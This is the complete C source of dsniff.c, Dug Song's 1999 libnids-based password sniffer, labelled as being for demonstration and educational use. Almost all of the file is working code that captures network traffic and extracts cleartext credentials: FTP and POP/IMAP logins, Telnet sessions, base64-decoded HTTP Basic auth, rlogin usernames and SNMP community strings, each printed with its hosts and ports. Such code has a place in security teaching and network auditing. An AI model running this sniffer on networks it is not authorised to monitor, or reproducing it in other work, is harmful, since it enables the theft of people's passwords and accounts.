/*
  dsniff.c

  simple libnids-based password sniffer, because DrHoney wanted one.

  minimally decodes FTP, Telnet, HTTP, POP, IMAP, SNMP auth info.
  this is for demonstration purposes and educational use only.
  
  Copyright (c) 1999 Dug Song <dugsong@monkey.org>
  All rights reserved, all wrongs reversed.

  Redistribution and use in source and binary forms, with or without
  modification, are permitted provided that the following conditions
  are met:

  1. Redistributions of source code must retain the above copyright
     notice, this list of conditions and the following disclaimer.
  2. Redistributions in binary form must reproduce the above copyright
     notice, this list of conditions and the following disclaimer in the
     documentation and/or other materials provided with the distribution.
  3. The name of author may not be used to endorse or promote products
     derived from this software without specific prior written permission.

  THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
  INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
  AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
  THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
  OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
  WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
  OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
  ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

  $Id: dsniff.c,v 1.10 1999/12/21 13:19:10 dugsong Exp $
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <arpa/telnet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <nids.h>

#include "version.h"

#define MAX_LINES	6
#define MIN_SNAPLEN	512

#define int_ntoa(x)	inet_ntoa(*((struct in_addr *)&(x)))

extern int base64_decode(char *in, char *out, int len);

/* Globals. */
char	Buf[BUFSIZ];
int	Lines = MAX_LINES;
int	Snaplen = MIN_SNAPLEN;

void
usage(void)
{
  fprintf(stderr, "Usage: dsniff\n");
  exit(1);
}

#ifndef OpenBSD
size_t
strlcpy(char *dst, const char *src, size_t siz)
{
  char *d = dst;
  const char *s = src;
  size_t n = siz;
  
  if (n != 0 && --n != 0) {
    do {
      if ((*d++ = *s++) == 0) break;
    } while (--n != 0);
  }
  if (n == 0) {
    if (siz != 0) *d = '\0';
    while (*s++) ;
  }
  return (s - src - 1);
}

size_t
strlcat(char *dst, const char *src, size_t siz)
{
  char *d = dst;
  const char *s = src;
  size_t dlen, n = siz;

  while (*d != '\0' && n-- != 0) d++;
  dlen = d - dst;
  n = siz - dlen;
  
  if (n == 0) return (dlen + strlen(s));
  for ( ; *s != '\0'; s++) {
    if (n != 1) {
      *d++ = *s;
      n--;
    }
  }
  *d = '\0';
  
  return (dlen + (s - src));
}
#endif /* !OpenBSD */

#ifdef DEBUG
/* Print a buffer in hex. */
void
hex_print(u_char *buf, int len)
{
  int i;
  
  for (i = 0; i < len; i++) {
    if (!(i & 0xF)) printf("\n");
    else if (!(i % 2)) printf(" ");
    printf("%.2x", buf[i]);
  }
  printf("\n");
}
#endif /* DEBUG */

/* Locate substring in a binary string. */
u_char *
bufstr(u_char *buf1, int len1, u_char *buf2, int len2)
{
  u_char *p;

  for (p = buf1; p < buf1 + len1 - len2; p++) {
    if (memcmp(p, buf2, len2) == 0)
      return (p);
  }
  return (NULL);
}
  
/* Strip telnet options, as well as suboption data. */
int
strip_telopts(u_char *buf, int len)
{
  int i, j, subopt = 0;
  char *p, *q;
  
  Buf[0] = '\0';
  
  for (i = j = 0; i < len; i++) {
    if (buf[i] == IAC) {
      if (++i >= len) break;
      else if (buf[i] > SB)
	i++;
      else if (buf[i] == SB) {
	/* Check for autologin username. */
	p = buf + i + 1;
	if ((q = bufstr(p, len - i, "\xff", 1)) != NULL) {
	  if ((p = bufstr(p, q - p, "USER\x01", 5)) != NULL) {
	    p += 5;
	    Buf[j++] = '[';
	    memcpy(Buf + j, p, q - p); j += q - p;
	    Buf[j++] = ']'; Buf[j++] = '\n';
	  }
	}
	subopt = 1;
      }
      else if (buf[i] == SE) {
	if (!subopt)
	  Buf[0] = '\0';
	subopt = 0;
      }
    }
    else if (!subopt) {
      if (buf[i] == '\r' &&
	  i + 1 < len && buf[i + 1] != '\n')
	Buf[j++] = '\n';
      else if (buf[i] != '\0')
	Buf[j++] = buf[i];
    }
  }
  memcpy(buf, Buf, j);
  buf[j] = '\0';

  return (j);
}

/* Strip a buffer down to a maximum number of lines. */
int
strip_lines(char *buf, int max_lines)
{
  int num = 0;

  if (!buf) return (0);

  while (num < max_lines && (buf = strchr(buf, '\n')) != NULL) {
    buf++; num++;
  }
  if (buf) *buf = '\0';

  return (num);
}

int
decode_ftp_auth(char *buf, int len)
{
  char *p;
  
  Buf[0] = '\0';

  for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
    if (strncasecmp(p, "USER ", 5) == 0 ||
	strncasecmp(p, "PASS ", 5) == 0 ||
	strncasecmp(p, "ACCT ", 5) == 0) {
      strlcat(Buf, p, sizeof(Buf));
      strlcat(Buf, "\n", sizeof(Buf));
    }
  }
  strlcpy(buf, Buf, len);

  return (strlen(buf));
}

int
decode_http_auth(char *buf, int len)
{
  char *p, *q;
  int i;

  /* Chop header. */
  if ((p = strstr(buf, "\r\n\r\n")) == NULL)
    if ((p = strstr(buf, "\n\n")) == NULL)
      return (0);

  *p = Buf[0] = '\0';

  /* Check for auth info. */
  if ((p = strstr(buf, "uthorization: ")) == NULL)
    return (0);

  for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
    if (!strlen(p)) {
      continue;
    }
    else if (strncasecmp(p, "GET ", 4) == 0 ||
	strncasecmp(p, "POST ", 5) == 0) {
      strlcat(Buf, p, sizeof(Buf));
      strlcat(Buf, "\n", sizeof(Buf));
    }
    else if (strncasecmp(p, "Host: ", 6) == 0) {
      strlcat(Buf, p, sizeof(Buf));
      strlcat(Buf, "\n", sizeof(Buf));
    }
    else if (strncasecmp(p, "Authorization: Basic ", 21) == 0) {
      strlcat(Buf, p, sizeof(Buf));
      strlcat(Buf, " [", sizeof(Buf));
      p += 21;
      i = strlen(Buf);
      q = Buf + i;
      q += base64_decode(p, q, len - i - 2);
      q[0] = '\0';
      strlcat(Buf, "]\n", sizeof(Buf));
    }
  }
  strlcpy(buf, Buf, len);

  return (strlen(buf));
}

int
decode_pop_auth(char *buf, int len)
{
  char *p, *q;
  int i;
  
  Buf[0] = '\0';

  for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
    if (strncasecmp(p, "AUTH PLAIN", 10) == 0 ||
	strncasecmp(p, "AUTH LOGIN", 10) == 0) {
      char *user, *pass;
      
      /* Decode SASL auth. */
      strlcat(Buf, p, sizeof(Buf));
      strlcat(Buf, "\n", sizeof(Buf));

      if ((user = strtok(NULL, "\r\n")) != NULL &&
	  (pass = strtok(NULL, "\r\n")) != NULL) {
	strlcat(Buf, user, sizeof(Buf));
	strlcat(Buf, "\n", sizeof(Buf));
	strlcat(Buf, pass, sizeof(Buf));
	strlcat(Buf, " [", sizeof(Buf));
	i = strlen(Buf);
	q = Buf + i;
	q += base64_decode(pass, q, len - i - 2);
	*q = '\0';
	strlcat(Buf, "]\n", sizeof(Buf));
      }
    }
    /* Save regular POP2, POP3 auth info. */
    else if (strncasecmp(p, "USER ", 5) == 0 ||
	     strncasecmp(p, "PASS ", 5) == 0 ||
	     strncasecmp(p, "HELO ", 5) == 0) {
      strlcat(Buf, p, sizeof(Buf));
      strlcat(Buf, "\n", sizeof(Buf));
    }
  }
  strlcpy(buf, Buf, len);

  return (strlen(buf));
}

int
decode_imap_auth(char *buf, int len)
{
  char *p, *q;
  
  Buf[0] = '\0';

  for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
    if ((q = strchr(p, ' ')) != NULL) {
      if (strncasecmp(q++, "LOGIN ", 6) == 0) {
	strlcat(Buf, p, sizeof(Buf));
	strlcat(Buf, "\n", sizeof(Buf));
      }
    }
  }
  strlcpy(buf, Buf, len);
  
  return (strlen(buf));
}

int
decode_rlogin_auth(char *buf, int len)
{
  char *p, *q;

  p = buf + 1;				/* Skip first NULL */

  strlcpy(Buf, "[", sizeof(Buf));
  strlcat(Buf, p, sizeof(Buf));		/* Local username */
  strlcat(Buf, ":", sizeof(Buf));
  p += strlen(p) + 1;

  strlcat(Buf, p, sizeof(Buf));		/* Remote username */
  strlcat(Buf, "]\n", sizeof(Buf));
  p += strlen(p) + 1;

  p += strlen(p) + 1;			/* Skip term info */

  if ((q = strstr(p, "\xff\xffss")) != NULL)	/* Skip window size */
    p += 12;
  
  for (p = strtok(p, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
    strlcat(Buf, p, sizeof(Buf));
    strlcat(Buf, "\n", sizeof(Buf));
  }
  strlcpy(buf, Buf, len);

  return (strlen(buf));
}

int
get_asn1_len(u_char **buf)
{
  u_char *p;
  int len, num = 0;
  
  p = *buf;
  
  if (*p >= 128) {	/* Long form */
    len = *p++ & ~128;
    
    if (len == 1) {
      num = *p++;
    }
    else if (len == 2) {
      GETSHORT(num, p);
    }
    else if (len == 3) {
      p--; GETLONG(num, p);
      num &= 0xFFF;
    }
    else if (len== 4)
      GETLONG(num, p);
  }
  else num = *p++;	/* Short form */

  *buf = p;
  
  return (num);
}

int
decode_snmp_auth(u_char *buf, int buflen)
{
  u_char *p = buf;
  int vers, len;
  
  if ((*p++ & 0x1F) != 16)	/* XXX - check for sequence */
    return (0);
  len = get_asn1_len(&p);	/* XXX - skip sequence length */
  
  if ((*p++ & 0x1F) != 2)	/* XXX - check for int */
    return (0);
  if (get_asn1_len(&p) != 1)	/* XXX - check version length (always 1?) */
    return (0);
  vers = *p++;
  
  p++;				/* XXX - skip class, tag. */
  len = get_asn1_len(&p);	/* octet string length */
  strlcpy(Buf, p, len + 1);	/* community */

  snprintf(buf, buflen, "[version %d]\n", vers + 1);
  strlcat(buf, Buf, buflen);
  
  return (strlen(buf));
}

void
print_session(u_long src, u_short sport,
	      u_long dst, u_short dport,
	      char *service, char *data)
{
  time_t t;
  struct tm *tm;
  char now[24];

  t = time(NULL);
  tm = localtime(&t);
  strftime(now, sizeof(now), "%x %X", tm);
  
  printf("---------------------------------\n");
  printf("%s %s:%d -> ", now, int_ntoa(src), sport);
  printf("%s:%d (%s)\n", int_ntoa(dst), dport, service);
  printf("%s\n", data);
  
  fflush(stdout);
}

void
print_tcp_client(struct tcp_stream *ts, int len)
{
  char *service;
  
  if (len <= 0) return;

  /* Pre-process output. */
  switch (ts->addr.dest) {
  case 21:
    service = "ftp";
    if (strip_telopts(ts->server.data, len) == 0)
      return;
    if (!decode_ftp_auth(ts->server.data, len))
      return;
    break;
  case 23:
    service = "telnet";
    if (strip_telopts(ts->server.data, len) == 0)
      return;
    if (strip_lines(ts->server.data, Lines) == 0)
      return;
    break;
  case 80:
    service = "http";
    if (!decode_http_auth(ts->server.data, len))
      return;
    break;
  case 109:
  case 110:
    service = "pop";
    if (!decode_pop_auth(ts->server.data, len))
      return;
    break;
  case 143:
    service = "imap";
    if (!decode_imap_auth(ts->server.data, len))
      return;
    break;
  case 513:
    service = "rlogin";
    if (!decode_rlogin_auth(ts->server.data, len))
      return;
    if (strip_lines(ts->server.data, Lines) == 0)
      return;
    break;
  default:
    service = "unknown";
    if (strip_lines(ts->server.data, Lines) == 0)
      return;
    break;
  }
  print_session(ts->addr.saddr, ts->addr.source,
		ts->addr.daddr, ts->addr.dest,
		service, ts->server.data);
}

void
print_udp_client(struct ip *ip)
{
  struct udphdr *udp;
  int ip_hl, udp_bl;
  u_char *udp_b;
  char *service;

  if (ip->ip_p != IPPROTO_UDP) return;

  ip_hl = ip->ip_hl * 4;
  udp = (struct udphdr *)((u_char *)ip + ip_hl);
  udp_b = (u_char *)udp + 8;
  udp_bl = ntohs(udp->uh_ulen) - 8;

  if (ntohs(ip->ip_len) - ip_hl != ntohs(udp->uh_ulen))
    return;
  
  switch (ntohs(udp->uh_dport)) {
  case 161:
    service = "snmp";
    if (!decode_snmp_auth(udp_b, udp_bl))
      return;
    break;
  default:
    return;
    break;
  }
  print_session(ip->ip_src.s_addr, ntohs(udp->uh_sport),
		ip->ip_dst.s_addr, ntohs(udp->uh_dport),
		service, udp_b);
}
  
void
sniff_tcp_client(struct tcp_stream *ts, void **whatever)
{
  u_short dport;
  int len;

  dport = ts->addr.dest;

  switch (ts->nids_state) {
    
  case NIDS_JUST_EST:
    /* FTP, telnet, POP, IMAP, login */
    if (dport == 21 || dport == 23 || dport == 80 || dport == 109 ||
	dport == 110 || dport == 143 || dport == 220 || dport == 513)
      ts->server.collect = 1;
    break;
    
  case NIDS_DATA:
    len = ts->server.count - ts->server.offset;

    if (len < MIN_SNAPLEN) {
      /* Not enough data yet, save buffer. */
      nids_discard (ts, 0);
    }
    else {
      /* Log and discard this stream. */
      print_tcp_client(ts, len);
      ts->server.collect = 0;
    }
    break;
    
  default:
    /* Connection closing, log what we can. */
    print_tcp_client(ts, ts->server.count - ts->server.offset);
    ts->server.collect = 0;
    break;
  }
}

int
sniff_udp_client(struct ip *ip)
{
  if (ip->ip_p == IPPROTO_UDP) {
    struct udphdr *udp;
    int ip_hl = ip->ip_hl * 4;
  
    if (ntohs(ip->ip_len) - ip_hl < 8)
      return (0);

    udp = (struct udphdr *)((u_char *)ip + ip_hl);
    
    switch (ntohs(udp->uh_dport)) {
    case 161:
      break;
    default:
      return (0);
    }
  }
  return (1);
}
  
int
main(int argc, char *argv[])
{
  char c;

  while ((c = getopt(argc, argv, "h?V")) != EOF) {
    switch (c) {
    case 'V':
      fprintf(stderr, "Version: %s\n", VERSION);
      usage();
      break;
    default:
      usage();
    }
  }
  argc -= optind;
  argv += optind;

  if (argc != 0)
    usage();
  
  nids_params.ip_filter = sniff_udp_client;
  /*
    this will have to wait until the new libnids version is out.
    nids_params.scan_num_hosts = 0;
  */
  
  if (!nids_init()) {
    fprintf (stderr, "%s\n", nids_errbuf);
    exit(1);
  }
  nids_register_ip(print_udp_client);
  
  nids_register_tcp(sniff_tcp_client);

  nids_run();

  /* NOTREACHED */
  exit(0);
}

/* 5000. */
